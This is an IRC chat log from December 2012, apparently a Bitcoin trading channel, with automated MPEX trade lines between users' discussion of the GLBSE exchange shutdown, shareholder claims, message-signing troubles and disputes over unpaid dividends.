01:56:08 i have absolutely no issue with the timestamp Dec 08 01:56:20 um assbot is not supy Dec 08 01:56:20 I think I am completely misunderstanding what your wanting then hehe Dec 08 01:56:30 supy? Dec 08 01:56:38 also timestamp is there because of twitter will mute 'dupe' orders Dec 08 01:56:42 http://dpaste.com/842754/ Dec 08 01:56:58 twit must be uniqe Dec 08 01:57:19 ah Dec 08 01:57:27 I will add micerotime onto the ts then Dec 08 01:57:39 Ukto, i'm not wanting anything particular, just poking a bit Dec 08 01:57:59 jurov: I am happy to do w/e for ppl. Just need to understand what it is. (I can be dense. ;) Dec 08 01:58:12 thanks for pointing that out kakobreklaaa Dec 08 01:58:19 dense? you're in good comapny then ;) Dec 08 01:58:26 LOL Dec 08 02:12:06 [MPEX] [S.MPOE] 1076 @ 0.00052726 = 0.5673 BTC [-] Dec 08 02:14:45 [MPEX] [S.MPOE] 3245 @ 0.00052726 = 1.711 BTC [-] Dec 08 02:14:47 [MPEX] [S.MPOE] 4028 @ 0.00052707 = 2.123 BTC [-] Dec 08 02:19:11 [MPEX] [S.DICE] 5370 @ 0.0033 = 17.721 BTC [-] Dec 08 02:19:19 a DEGREE in homeland security ? Dec 08 02:19:24 omfg the gestapo is back. Dec 08 02:20:14 jurov: heh, you know, when I mentioned I was setting up for the twatter crap, etc, no one bothreed to throw it out then :P << i had a number of times, but it's not for twitter, it's in general. Dec 08 02:20:19 to talk to your exchange. Dec 08 02:20:57 JWU42 i wouldn't get too excited. a lot of people are dealing with a lot of greif as best they can. Dec 08 02:21:17 mircea_popescu: yeah - understood Dec 08 02:21:39 but it is fair to say that my wo partners current fiscal mess is impacting YABMC Dec 08 02:21:45 the day glbse went down everyone in the know was "oh shit, check out the wave of 20 dollar investors tsunami nao" Dec 08 02:21:45 two* Dec 08 02:21:47 so... yeah. Dec 08 02:22:25 as some have said on the forums - it is similar to the morgage meltdown here Dec 08 02:22:44 the handful of larger lenders didn't realize how intertwined they were Dec 08 02:22:55 and played it far too loose (self included) Dec 08 02:23:10 and the one major event of Pirate brought many down Dec 08 02:23:55 but to his question - I have every intent TO pay Dec 08 02:24:27 timing and amount is the question - especially if it ends up that 2/3 of YABMC cannot pay (HK and PH) Dec 08 02:26:06 last iirc from hashking was something ridiculous like 1/3 in 3 years. Dec 08 02:26:25 yeah - that is what I read Dec 08 02:26:29 ph is proper screwed, so, i'd be much surprised. Dec 08 02:26:41 mircea: That sums pretty much 90% of people on my lists. Dec 08 02:26:44 they are both in deep for sure Dec 08 02:26:56 I am in deep - just not as deep Dec 08 02:27:15 the losses are more personal and not OPM Dec 08 02:27:23 or OPC Dec 08 02:27:38 [MPEX] [S.MPOE] 7646 @ 0.00052769 = 4.0347 BTC [+] Dec 08 02:27:40 [MPEX] [S.MPOE] 4321 @ 0.00053192 = 2.2984 BTC [+] Dec 08 02:27:41 [MPEX] [S.MPOE] 12383 @ 0.00053214 = 6.5895 BTC [+] Dec 08 02:27:51 for those not following (other peoples coins) Dec 08 02:29:48 ôôticker Dec 08 02:29:53 ;;ticker Dec 08 02:29:54 BTCUSD ticker | Best bid: 13.49991, Best ask: 13.50000, Bid-ask spread: 0.00009, Last trade: 13.49991, 24 hour volume: 32116.39802185, 24 hour low: 12.97500, 24 hour high: 13.54900, 24 hour vwap: 13.35262 Dec 08 02:32:05 [MPEX] [S.MPOE] 293 @ 0.00052707 = 0.1544 BTC [-] Dec 08 02:32:06 [MPEX] [S.MPOE] 9815 @ 0.000527 = 5.1725 BTC [-] Dec 08 02:32:08 [MPEX] [S.MPOE] 13000 @ 0.00052312 = 6.8006 BTC [-] Dec 08 02:32:08 [MPEX] [S.MPOE] 2114 @ 0.00052289 = 1.1054 BTC [-] Dec 08 02:40:23 rg, don't forget to distribute this month! Dec 08 02:42:07 [MPEX] [S.MPOE] 4321 @ 0.00052307 = 2.2602 BTC [+] Dec 08 02:42:08 [MPEX] [S.MPOE] 6229 @ 0.00052289 = 3.2571 BTC [-] Dec 08 02:45:45 [MPEX] [S.DICE] 4700 @ 0.0033 = 15.51 BTC [-] Dec 08 02:46:31 hm, has rg said anything to anyone of late ? Dec 08 02:52:25 I spoke to him less than a week ago. Dec 08 02:52:37 He answers PM sometimes. Dec 08 02:53:01 But he said he's been working 60+ hours weeks so aye, he's not always here to talk. Dec 08 02:54:07 aha Dec 08 02:54:38 [MPEX] [S.MPOE] 4321 @ 0.00053193 = 2.2985 BTC [+] Dec 08 02:54:40 [MPEX] [S.MPOE] 9779 @ 0.00053214 = 5.2038 BTC [+] Dec 08 03:07:38 jebus giga, the amount of shit you eat, yet you yourself shit flowers Dec 08 03:08:06 srsly, insert insult, exit plesant statement Dec 08 03:09:58 smickles the worst part is that the most heard explanation as to why people won't list is that "they don't want to put up with the shitheads on the forum etc" Dec 08 03:10:21 and sadly i don't have an answer to that one yet. Dec 08 03:10:25 Ah yes, on that part, Giga has been examplary. No matter how many insults you throw at him, not resort to getting mad and start name calling too. Dec 08 03:10:40 Who says they won't list what? Dec 08 03:11:03 Namjies and as you can see, it does precious good, they still do it. Dec 08 03:12:31 Well it doesn't do much to improve the situation. But it prevents the situation from worsening. Dec 08 03:12:36 [MPEX] [S.MPOE] 4321 @ 0.0005231 = 2.2603 BTC [-] Dec 08 03:12:38 [MPEX] [S.MPOE] 8479 @ 0.00052289 = 4.4336 BTC [-] Dec 08 03:13:14 i fail to see the difference. mpoe-pr brings a bigger stick, giga is always nice. overall the count of idiocy thrown at either is the same. Dec 08 03:13:28 which is unsurprising, seeing how it's a function of the number of idiots running around, not a function of what they do Dec 08 03:13:36 (this being the very definition of idiocy) Dec 08 03:13:54 If he were to insult back people, a bit like Usagi or some others did, well it's akin to extinguishing fire with kerosene. It's counter-productive. Dec 08 03:14:16 usagi isn't a good example. Dec 08 03:14:25 Maybe not. Dec 08 03:14:36 he's a liability to himself whatever he says. Dec 08 03:17:04 But people are angry at a situation and makes a colorful statements. You can take the time to answer the (more or less) coherent parts nicely or insult back. Replying someone accusing you of scamming you with a nice "fuck you too" is not very useful. Dec 08 03:17:40 you posit this as a point of personal prejudice. Dec 08 03:17:52 fact of the matter is, the results are about the same whether you beat up the idiots or are nice to them. Dec 08 03:18:11 of course, if you're an idiot yourself the results won't be the same (hence, usagi) Dec 08 03:18:15 but that's besides the point. Dec 08 03:20:04 If you insult them without anything else, it just gets them angrier. Dec 08 03:20:18 [MPEX] [S.MPOE] 4321 @ 0.00053192 = 2.2984 BTC [+] Dec 08 03:20:19 [MPEX] [S.MPOE] 2279 @ 0.00053214 = 1.2127 BTC [+] Dec 08 03:20:22 that's true. Dec 08 03:21:24 Hence why I state staying calm when an angry mob hurls insults at you is preferable to screaming back at them. Dec 08 03:21:43 Not that not screaming back at them calms them. Dec 08 03:21:52 Or has any positive results. Dec 08 03:22:17 you can scare them straight. you just need to have the guts to actually do it. Dec 08 03:22:33 if you do it half way... well... that won't be pretty. Dec 08 03:23:20 Well perhaps you'll be able to demonstrate that then... I hardly see how, for example, Giga could scare people away. Dec 08 03:26:38 oh jeeze, I just received the first claim which does not match with the data from nefario Dec 08 03:28:41 I had a few of those Dec 08 03:28:53 Most have been corrected by now in updates sent by Nefario Dec 08 03:29:07 Not a single false claim so far, as far as I know. Dec 08 03:29:17 It's pretty amazing Dec 08 03:29:26 I was not expecting that. Dec 08 03:32:15 this one was a ~1% shareholder apparently Dec 08 03:33:42 Eh, I had claims not on nefario's first list for up to ~20% Dec 08 03:34:31 if nefario's list is to be believed, that's not possible in my case Dec 08 03:35:00 Ah, goes over the issued shares? Dec 08 03:35:37 naw, nefario's list accounts for > 95% of shares Dec 08 03:36:05 Oh. Dec 08 03:36:05 I thought it was a complete list at first Dec 08 03:36:39 Mines were far from complete. Unnoficial claims and updates from nefario are become less and less. Dec 08 03:36:56 At this rate there will be ~10%-30% unclaimed on each issue. Dec 08 03:37:51 I feel for this person's position, /they make a claim /me says it doesn't match /they must think i just told them to sit and spin left 3 times Dec 08 03:38:02 Except BTC-BOND, I had 269 BTC loans from that Dec 08 03:38:26 of which 2 x 100 BTC claims and 1 x 50 BTC Dec 08 03:38:52 3 people pretty much had all of it. Dec 08 03:39:16 how about that Dec 08 03:39:27 what did you need an exchange for then? Dec 08 03:40:03 Eh, I didn't know who had anything. Dec 08 03:40:48 People don't typically lend such large sums on the OTC. Dec 08 03:41:18 It was also simplier to manage more loans, wether a fraction of a BTC or large amounts. Dec 08 03:42:25 well, i was speaking terms of hindsight, and annoyance at this whole situation Dec 08 03:43:20 Ah, well it's still an easy one to manage even with the situation. Dec 08 03:45:11 oh hey, I have 31 shares of SS apparently. Dec 08 03:46:07 well, sign something with the claim address and send that message and sig to me signed by your WoT id, preferrably Dec 08 03:46:33 ack, what did i just type Dec 08 03:47:18 well, sign something with the claim address and send that message to me signed by your WoT id, preferrably Dec 08 03:47:27 [MPEX] [S.MPOE] 4321 @ 0.00052304 = 2.2601 BTC [-] Dec 08 03:47:29 [MPEX] [S.MPOE] 7229 @ 0.00052289 = 3.78 BTC [-] Dec 08 03:47:46 arg, let's try again Dec 08 03:47:57 well, sign something with the claim address and send that message and signature to me signed by your WoT id, preferrably Dec 08 03:48:08 it's really simple, i swear Dec 08 03:48:46 oh yeah, you need to tell me the addy too, so that I can verify the first sig w/o guesswork Dec 08 03:52:24 Can't I just receive payments at shown address when available eh? Dec 08 03:54:14 Here's a signature from said bitcoin address stating I'm Namjies on #bitcoin-otc on freenode: http://pastebin.com/9fDgB1Bj Dec 08 03:57:50 As for a statement from me... well I'm currently authed, do I really need to sign what I say to you? Dec 08 03:58:26 If I had to change payment address, I'd sign with the GLBSE address. Dec 08 04:05:57 [MPEX] [S.MPOE] 4321 @ 0.00053205 = 2.299 BTC [+] Dec 08 04:05:58 [MPEX] [S.MPOE] 3232 @ 0.00053214 = 1.7199 BTC [+] Dec 08 04:06:00 [MPEX] [S.MPOE] 1504 @ 0.00053214 = 0.8003 BTC [+] Dec 08 04:06:01 [MPEX] [S.MPOE] 6543 @ 0.00053227 = 3.4826 BTC [+] Dec 08 04:22:39 [MPEX] [S.MPOE] 4321 @ 0.00052294 = 2.2596 BTC [-] Dec 08 04:22:40 [MPEX] [S.MPOE] 10949 @ 0.00052289 = 5.7251 BTC [-] Dec 08 04:25:50 Namjies: fine with me on all counts, except that I don't recognize the format of that signature Dec 08 04:26:18 i'm used to them looking like IIRqUyEb9WhOKj/kDzSzNaOTPM5Of/FHwMyVC5z3+HU+3Sjt1G0jUwOFP9rUfKAEZTU4I5bUTXDkv+MS9F4CZc0= Dec 08 04:27:33 oh, the Bitcoin-QT client Dec 08 04:27:41 yeah... I hate that Dec 08 04:27:55 Different clients, different methods of signing Dec 08 04:28:02 It's an Armory signature Dec 08 04:28:40 let me look into what that entails, unless you want to do additional work, that should be fine :) Dec 08 04:30:49 It entails opening armory, opening the message signing dialog in the tools menu and clicking on the import signature button Dec 08 04:31:09 Then you get a nice window to paste a signature block. Dec 08 04:31:34 Easy process Dec 08 04:32:05 aw, c'mon, i can't dig thru the armory code to find the method they use and write a python script to imitate the verification? Dec 08 04:32:53 oh hey, i see .py files anyway Dec 08 04:33:00 Well yes, you can Dec 08 04:33:32 If you prefer to do it that way. Dec 08 04:35:00 [MPEX] [S.MPOE] 7600 @ 0.00052282 = 3.9734 BTC [-] Dec 08 04:50:22 [MPEX] [S.MPOE] 4321 @ 0.0005224 = 2.2573 BTC [-] Dec 08 04:50:23 [MPEX] [S.MPOE] 7979 @ 0.00052229 = 4.1674 BTC [-] Dec 08 04:51:48 ok, found the relevant section of code Dec 08 04:53:47 [MPEX] [S.DICE] 1301 @ 0.00333853 = 4.3434 BTC [+] Dec 08 04:59:06 [MPEX] [S.MPOE] 4321 @ 0.00052278 = 2.2589 BTC [+] Dec 08 04:59:08 [MPEX] [S.MPOE] 3180 @ 0.00052282 = 1.6626 BTC [+] Dec 08 04:59:09 [MPEX] [S.MPOE] 10450 @ 0.00052621 = 5.4989 BTC [+] Dec 08 04:59:10 [MPEX] [S.MPOE] 12300 @ 0.0005302 = 6.5215 BTC [+] Dec 08 04:59:11 [MPEX] [S.MPOE] 4649 @ 0.00053227 = 2.4745 BTC [+] Dec 08 05:27:21 [MPEX] [S.MPOE] 2250 @ 0.00053178 = 1.1965 BTC [-] Dec 08 05:27:23 [MPEX] [S.MPOE] 4321 @ 0.00053216 = 2.2995 BTC [+] Dec 08 05:27:24 [MPEX] [S.MPOE] 2908 @ 0.00053227 = 1.5478 BTC [+] Dec 08 05:27:25 [MPEX] [S.MPOE] 14602 @ 0.00053232 = 7.7729 BTC [+] Dec 08 05:29:52 [MPEX] [S.MPOE] 4321 @ 0.00053198 = 2.2987 BTC [-] Dec 08 05:29:53 [MPEX] [S.MPOE] 1845 @ 0.00053232 = 0.9821 BTC [+] Dec 08 05:55:24 [MPEX] [S.MPOE] 3450 @ 0.00052558 = 1.8133 BTC [-] Dec 08 06:05:04 hmm, miss anything intersting? Dec 08 06:06:58 [MPEX] [S.MPOE] 4321 @ 0.00052577 = 2.2719 BTC [+] Dec 08 06:06:59 [MPEX] [S.MPOE] 4321 @ 0.00052568 = 2.2715 BTC [-] Dec 08 06:07:01 [MPEX] [S.MPOE] 7950 @ 0.00052558 = 4.1784 BTC [-] Dec 08 06:07:01 [MPEX] [S.MPOE] 2708 @ 0.00052432 = 1.4199 BTC [-] **** BEGIN LOGGING AT Sat Dec 8 06:35:11 2012 Dec 08 06:53:01 hey guys, cognitive is live again! https://btct.co/security/COGNITIVE Dec 08 06:53:53 who manages btct.co? Dec 08 06:54:29 burnside Dec 08 06:54:45 Ah. Dec 08 06:54:51 I trust him. He also manages litecoin global Dec 08 07:00:41 [MPEX] [S.MPOE] 11850 @ 0.0005246 = 6.2165 BTC [+] Dec 08 07:09:26 yeah Dec 08 07:09:32 garr: i saw some weirdness earlier Dec 08 07:09:37 when i first logged in Dec 08 07:09:43 there were a bunch of trades listed for the asset Dec 08 07:09:47 then they all dissapeared Dec 08 07:09:54 went down to just 3 Dec 08 07:13:25 Ukto, I've never seen more than the 3, that is odd indeed. Dec 08 07:13:47 [MPEX] [S.MPOE] 1950 @ 0.0005246 = 1.023 BTC [+] Dec 08 07:13:48 [MPEX] [S.MPOE] 21050 @ 0.00053025 = 11.1618 BTC [+] Dec 08 07:15:23 it was much earlier Dec 08 07:15:33 listed all the transactions within about 2 min of each other Dec 08 07:15:47 it was interseting, the total was the difference between total shares and outstanding Dec 08 07:16:18 Ukto, it must have been the way the shares were moved from the holding account to the newly created shareholders' accounts Dec 08 07:16:29 probably Dec 08 07:16:36 and then they reset the trade history Dec 08 07:16:47 burnside made an awesome script that does everything, so yeah that's likely what happened Dec 08 07:16:53 hehe Dec 08 07:17:09 At first I about fell out of my chair in awe of the transactions hehe Dec 08 07:17:21 when I saw it had reset, I figured it was probably just that Dec 08 07:17:22 haha Dec 08 07:17:25 [MPEX] [S.MPOE] 17392 @ 0.00052432 = 9.119 BTC [-] Dec 08 07:17:26 [MPEX] [S.MPOE] 6408 @ 0.00052229 = 3.3468 BTC [-] Dec 08 07:17:27 yep Dec 08 07:17:47 i was debating throwing all my solo-mined ltc at some shares of ltc-global Dec 08 07:18:00 built up quite a stash Dec 08 07:18:05 never exchanged em Dec 08 07:18:52 I saw you pushed off the big div payout to next week Dec 08 07:19:15 if you make a div payout, what happens to the divs that goto the ppl who have not claimed yet? Dec 08 07:19:48 I kinda figured the divs would have gone out to all the holders at re-launch Dec 08 07:20:03 rather than making them hold back from selling any shares, and dilute it with the new ones Dec 08 07:24:19 but thats just me. hehe Dec 08 07:26:02 [MPEX] [S.MPOE] 16530 @ 0.00052804 = 8.7285 BTC [+] Dec 08 07:31:07 [MPEX] [S.MPOE] 4321 @ 0.00053018 = 2.2909 BTC [+] Dec 08 07:31:08 [MPEX] [S.MPOE] 1079 @ 0.00053025 = 0.5721 BTC [+] Dec 08 07:38:43 [MPEX] [S.MPOE] 4321 @ 0.00052808 = 2.2818 BTC [-] Dec 08 07:38:44 [MPEX] [S.MPOE] 4679 @ 0.00052804 = 2.4707 BTC [-] Dec 08 07:39:32 [MPEX] [S.MPOE] 13941 @ 0.00052804 = 7.3614 BTC [-] Dec 08 07:39:34 [MPEX] [S.MPOE] 1309 @ 0.00052229 = 0.6837 BTC [-] Dec 08 07:46:06 [MPEX] [S.MPOE] 4321 @ 0.00052242 = 2.2574 BTC [+] Dec 08 07:46:08 [MPEX] [S.MPOE] 3079 @ 0.00052229 = 1.6081 BTC [-] Dec 08 07:47:43 Ukto, All of the already issued and unclaimed shares' dividends go to a holding account, where the shares and respective dividends are held until they are claimed Dec 08 07:48:16 I have just received a payment on my GLBSE address Dec 08 07:48:18 but thats after you do the big div payout Dec 08 07:48:19 right? Dec 08 07:48:27 next week? Dec 08 07:48:34 Namjies: yay Dec 08 07:48:36 hows it look Dec 08 07:48:46 Small and from an unkown source Dec 08 07:48:52 0,o Dec 08 07:48:55 0.12 bitcoin Dec 08 07:49:10 wtf? lol Dec 08 07:49:20 What? GLBSE addresses were given to all issuers and I had lots of things. Dec 08 07:49:26 what assets did you hold ? Dec 08 07:49:27 ahh Dec 08 07:49:50 i wasnt allwoed to claim my few shares of things on glbse Dec 08 07:49:59 somehow my 2fa or account in general would not work Dec 08 07:50:01 nefario wouldnt fix it Dec 08 07:50:05 couldnt claim. end of story. Dec 08 07:50:33 When I bought back things from my lists, I at least sent an email detailing how the amount was calculated and from which address to which address it was sent. Dec 08 07:50:42 What did you held? Dec 08 07:50:48 some JAH Dec 08 07:50:55 and uhh, i dont recall what else anymore... Dec 08 07:51:11 like 10 mroe shares of something else Dec 08 07:51:15 [MPEX] [S.MPOE] 12387 @ 0.00052229 = 6.4696 BTC [-] Dec 08 07:51:15 [MPEX] [S.MPOE] 9413 @ 0.00052192 = 4.9128 BTC [-] Dec 08 07:51:26 i only used the account 3 more times after my account was 'hacked' that time magically Dec 08 07:51:33 and then got tired of nefario and stopped touching it Dec 08 07:55:53 [MPEX] [S.MPOE] 6492 @ 0.00052192 = 3.3883 BTC [-] Dec 08 07:55:54 [MPEX] [S.MPOE] 6000 @ 0.00052087 = 3.1252 BTC [-] Dec 08 07:55:56 [MPEX] [S.MPOE] 6308 @ 0.00052067 = 3.2844 BTC [-] Dec 08 08:02:02 [MPEX] [S.MPOE] 14550 @ 0.0005239 = 7.6227 BTC [+] Dec 08 08:02:03 [MPEX] [S.MPOE] 350 @ 0.00052067 = 0.1822 BTC [-] Dec 08 08:22:12 lol, i think the spammers are swapping notes, Dec 08 08:22:17 [MPEX] [S.MPOE] 10350 @ 0.00052067 = 5.3889 BTC [-] Dec 08 08:22:22 subject: RAM IT IN YOUR ASS Dec 08 08:22:25 body: Dec 08 08:22:40 Hello, I represent the late Titus Carver... Dec 08 08:28:20 haha Dec 08 08:36:47 Oh damn Dec 08 08:36:59 I know why I always get a Bad Signature from gpg Dec 08 08:37:22 Ah wait, nvm Dec 08 08:37:26 It's still bad Dec 08 08:38:03 it's ok Namjies, just watch this: http://youtu.be/NFR-ADakI-c Dec 08 08:42:52 I always get a bad signature when copying a gpg signed message from windows command line. Dec 08 08:44:15 Would you happen to know how to solve that? Dec 08 08:45:44 Says unkown certificate... and shows a fingerprint in my list of trusted certificates... Dec 08 08:52:00 argh Dec 08 08:52:35 fuck this gpg signing thing, why does it never want to work properly? Dec 08 08:54:51 Anyone on linux and has gpg? Dec 08 09:20:02 [MPEX] [S.MPOE] 4321 @ 0.00053007 = 2.2904 BTC [+] Dec 08 09:20:04 [MPEX] [S.MPOE] 3121 @ 0.00053025 = 1.6549 BTC [+] Dec 08 09:20:05 [MPEX] [S.MPOE] 18558 @ 0.00053238 = 9.8799 BTC [+] Dec 08 09:26:33 Damn fucking damn Dec 08 09:27:31 I had to manually sign, encrypt, submit to MPEx and then decrypt and then verify file for it to work Dec 08 09:27:45 The windows command line must be screwing the formatting Dec 08 09:29:56 maybe got some ^M's in there Dec 08 09:31:33 Different clients, different methods of signing << this is such a horrible thing ;/ Dec 08 09:32:52 i only used the account 3 more times after my account was 'hacked' that time magically <<< you too ?! Dec 08 09:33:42 what's up Namjies ? Dec 08 09:34:09 prolly put it through a s//r//n//n/ Dec 08 09:38:57 dude srlsy, six months ago nefario was in here explaining how omg wtf am i fud-ing his great exchange by saying the session get hijacked Dec 08 09:39:03 it only happened once and it was user's fault. Dec 08 09:39:07 turns out it WASNT ONCE Dec 08 09:40:30 Could you explain further? Dec 08 09:40:38 about the s//r//n//n/ thing? Dec 08 09:43:10 I can say one thing. In notepad, I cannot see linebreaks for the correct file I obtained manually with gpg signing, but I can for the copy-paste from windows command line. In Notepad++, I can see linebreaks for both. Dec 08 09:43:27 So it's obviously a formatting issue Dec 08 09:44:19 back in may, around the middle of may to end Dec 08 09:44:35 he told me some other ip logged into my account, and dumped som 100btc worth of JAH shares down teh tube Dec 08 09:44:38 and withdrwa the btc Dec 08 09:44:50 was enough to kill the buys on the asset Dec 08 09:44:59 when i asked for the other ip Dec 08 09:45:01 he refused. Dec 08 09:45:06 end of story, have a great day. Dec 08 09:45:59 at that point my system was supposedly infected, which it was not, or i reused a user/pass Dec 08 09:46:06 which I actually did from btc-e Dec 08 09:46:32 I honestly do question btc-e :P but it was still my fault as Diablo-D3 pointed out, for not having 2fa Dec 08 09:46:33 so I gav eup Dec 08 09:46:44 woohoo... I manually sanitized my copy-paste from windows command line Dec 08 09:47:33 by using show all characters in Notepad++ and making all the whitespace match Dec 08 09:48:34 Windows command prompt also adds extra linebreaks because it refuses having lines longer than X characters. Dec 08 09:50:49 I'm glad to know I can actually use gpg correctly Dec 08 09:51:04 I can see why gpg was giving me so much problems now. Dec 08 09:53:24 [MPEX] [S.MPOE] 4321 @ 0.00053206 = 2.299 BTC [-] Dec 08 09:53:26 [MPEX] [S.MPOE] 5679 @ 0.00053238 = 3.0234 BTC [+] Dec 08 09:56:07 Namjies the problem is that new lines in windows are /r/b Dec 08 09:56:14 and on linux simply /n Dec 08 09:56:24 99% of the time it's what fucks up gpg signed stuff Dec 08 09:56:46 /r/n above obviously not /b Dec 08 09:57:31 Ukto teh suck. Dec 08 09:57:48 and to think all those idiots were making a living wall around nefario, the forum is incredible. Dec 08 10:07:28 http://boards.4chan.org/b/res/442267532 protip select no style pagestyle Dec 08 10:24:42 [MPEX] [S.MPOE] 4321 @ 0.00052146 = 2.2532 BTC [-] Dec 08 10:24:44 [MPEX] [S.MPOE] 4087 @ 0.00052117 = 2.13 BTC [-] Dec 08 10:29:33 [MPEX] [S.MPOE] 4321 @ 0.00052566 = 2.2714 BTC [+] Dec 08 10:29:34 [MPEX] [S.MPOE] 10479 @ 0.000526 = 5.512 BTC [+] Dec 08 10:33:13 [MPEX] [O.BTCUSD.P130T] 580 @ 0.1714009 = 99.4125 BTC [+] Dec 08 10:44:15 [MPEX] [S.MPOE] 14923 @ 0.00052117 = 7.7774 BTC [-] Dec 08 10:44:16 [MPEX] [S.MPOE] 12853 @ 0.00052067 = 6.6922 BTC [-] Dec 08 10:55:28 [MPEX] [S.MPOE] 2350 @ 0.00052091 = 1.2241 BTC [+] Dec 08 10:58:59 [MPEX] [S.MPOE] 1971 @ 0.00052091 = 1.0267 BTC [+] Dec 08 10:59:00 [MPEX] [S.MPOE] 16671 @ 0.00052067 = 8.6801 BTC [-] Dec 08 10:59:02 [MPEX] [O.BTCUSD.P140T] 316 @ 0.2247916 = 71.0341 BTC [+] Dec 08 11:13:41 [MPEX] [S.MPOE] 4321 @ 0.00052082 = 2.2505 BTC [+] Dec 08 11:13:43 [MPEX] [S.MPOE] 19318 @ 0.00052067 = 10.0583 BTC [-] Dec 08 11:13:44 [MPEX] [S.MPOE] 734 @ 0.00052062 = 0.3821 BTC [-] Dec 08 11:17:13 [MPEX] [S.DICE] 1613 @ 0.00335868 = 5.4176 BTC [+] Dec 08 11:17:14 [MPEX] [S.DICE] 68 @ 0.00336177 = 0.2286 BTC [+] Dec 08 11:21:28 [MPEX] [S.MPOE] 12135 @ 0.00052062 = 6.3177 BTC [-] Dec 08 11:49:31 [MPEX] [S.MPOE] 4321 @ 0.00052119 = 2.2521 BTC [+] Dec 08 11:49:33 [MPEX] [S.MPOE] 9500 @ 0.00052126 = 4.952 BTC [+] Dec 08 11:49:34 [MPEX] [S.MPOE] 15229 @ 0.000526 = 8.0105 BTC [+] Dec 08 11:51:14 [MPEX] [S.DICE] 1632 @ 0.00336177 = 5.4864 BTC [+] Dec 08 11:51:16 [MPEX] [S.DICE] 718 @ 0.0033662 = 2.4169 BTC [+] Dec 08 11:55:36 [MPEX] [S.MPOE] 4321 @ 0.00052591 = 2.2725 BTC [-] Dec 08 11:55:37 [MPEX] [S.MPOE] 3842 @ 0.000526 = 2.0209 BTC [+] Dec 08 11:55:38 [MPEX] [S.MPOE] 6746 @ 0.00052628 = 3.5503 BTC [+] Dec 08 11:56:42 [MPEX] [O.BTCUSD.C120T] 200 @ 0.25429173 = 50.8583 BTC [+] Dec 08 11:56:55 http://www.theblaze.com/stories/the-welfare-spending-chart-you-wont-want-to-see/ Dec 08 11:56:58 this is pretty good Dec 08 12:03:49 [MPEX] [S.MPOE] 4321 @ 0.00052959 = 2.2884 BTC [+] Dec 08 12:03:51 [MPEX] [S.MPOE] 2600 @ 0.00052979 = 1.3775 BTC [+] Dec 08 12:03:52 [MPEX] [S.MPOE] 15266 @ 0.00053238 = 8.1273 BTC [+] Dec 08 12:07:07 [MPEX] [S.MPOE] 12942 @ 0.00053238 = 6.8901 BTC [+] Dec 08 12:07:08 [MPEX] [S.MPOE] 21403 @ 0.00053248 = 11.3967 BTC [+] Dec 08 12:15:17 [MPEX] [S.MPOE] 4321 @ 0.000528 = 2.2815 BTC [-] Dec 08 12:15:18 [MPEX] [S.MPOE] 3191 @ 0.00052777 = 1.6841 BTC [-] Dec 08 12:15:20 [MPEX] [S.MPOE] 4453 @ 0.0005235 = 2.3311 BTC [-] Dec 08 12:25:58 [MPEX] [O.BTCUSD.C130T] 940 @ 0.20783398 = 195.3639 BTC [+] Dec 08 12:26:07 [MPEX] [S.MPOE] 4321 @ 0.0005237 = 2.2629 BTC [+] Dec 08 12:26:09 [MPEX] [S.MPOE] 16179 @ 0.0005235 = 8.4697 BTC [-] Dec 08 12:26:27 [MPEX] [O.BTCUSD.P120T] 940 @ 0.12671029 = 119.1077 BTC [+] Dec 08 12:27:49 https://plus.google.com/u/0/106097345901210573856/posts/bYczSq6EGwQ Dec 08 12:27:55 scroll down to my comment Dec 08 12:28:07 I just trolled someone using math and logic Dec 08 12:28:33 [MPEX] [S.MPOE] 1262 @ 0.00053246 = 0.672 BTC [+] Dec 08 12:31:33 "The US Government isn't dependent on income for spending because it makes the money. The US government doesn't work like your checkbook, your household, your state, or even Greece. It goes by different economic rules, so it can run a massive debt and not go bankrupt. It can always pay that debt back (although some caution is warranted when doing so, because the debt itself often serves a purpose)." Dec 08 12:31:42 i like these people running around. it's like... btctalk on a global scale Dec 08 12:31:45 very amusing. Dec 08 12:32:43 mircea_popescu: your pr-cunt has thrown a nice pile of shit in to the spinning fan. Where did you find this idiot? Dec 08 12:32:55 mircea_popescu: read my comment next Dec 08 12:33:03 EskimoBob more substance, less oppinion. Dec 08 12:33:12 Diablo-D3 i did. Dec 08 12:33:19 mircea_popescu: did I or did I not troll? Dec 08 12:33:31 with you one never knows. Dec 08 12:33:35 bah! Dec 08 12:34:20 https://images.encyclopediadramatica.se/thumb/f/f2/Trollface_More_HD.png/400px-Trollface_More_HD.png Dec 08 12:34:29 mircea_popescu: I want to see if anyone takes the bait on this one Dec 08 12:34:57 is she with you from your spamming days? Dec 08 12:35:02 prolly. Dec 08 12:35:10 EskimoBob wtf are you on about ? Dec 08 12:35:25 oh, don't be coy Dec 08 12:35:55 wait, spamming days? Dec 08 12:35:59 mircea_popescu IS A SPAM KING?! Dec 08 12:36:06 GASP! Dec 08 12:36:08 SHOCK! Dec 08 12:36:15 Diablo-D3 apparently child porn didn't stick so we're moving on. Dec 08 12:36:26 have i been a paid assassin or is that up next in 2013 ? Dec 08 12:36:54 I thought I was the paid assassin Dec 08 12:37:15 aok Dec 08 12:37:35 teh ciucius have to be moar careful, they'll run out of ominous things too soon at this rate. Dec 08 12:45:43 [MPEX] [S.MPOE] 13068 @ 0.0005235 = 6.8411 BTC [-] Dec 08 12:45:44 [MPEX] [S.MPOE] 2031 @ 0.00052062 = 1.0574 BTC [-] Dec 08 12:45:45 [MPEX] [S.MPOE] 701 @ 0.00052051 = 0.3649 BTC [-] Dec 08 12:55:57 EskimoBob o, were you aggitated cause you thought she was saying you're a scammer ? Dec 08 12:56:34 so cry babies, hws life Dec 08 12:56:57 pretty good psychoboy Dec 08 12:57:05 good to hear Dec 08 13:00:23 how about you ? Dec 08 13:13:06 [MPEX] [S.MPOE] 4321 @ 0.00052069 = 2.2499 BTC [+] Dec 08 13:13:08 [MPEX] [S.MPOE] 2743 @ 0.00052051 = 1.4278 BTC [-] Dec 08 13:14:49 JWU42, when are you planning to pay the oustanding dividends of YABMC and buy them since you closed the operation? Dec 08 13:16:00 You can forget that your scammer friends (hashking still ows me 150 BTC and Patrick Harnett) Dec 08 13:16:06 will ever pay you Dec 08 13:17:12 You got all the shareholders information, or are you playing dumb like most issuers Dec 08 13:18:18 hmmnz looks like I am talking to my dick, got no answer.... yet Dec 08 13:19:10 link plz Dec 08 13:19:42 lolz Dec 08 13:20:38 JWU42, most mining bond/share issuers already bought their outstanding shares back, Where are you waiting for?......Christmas? Dec 08 13:20:51 did he even get the list yet? Dec 08 13:20:56 yuyp Dec 08 13:21:01 oh kay Dec 08 13:21:18 I already got my lists of ABM, PGM and FDBF so Dec 08 13:21:48 ABM 99% complete PGM 45% complete FDBF 85% complete Dec 08 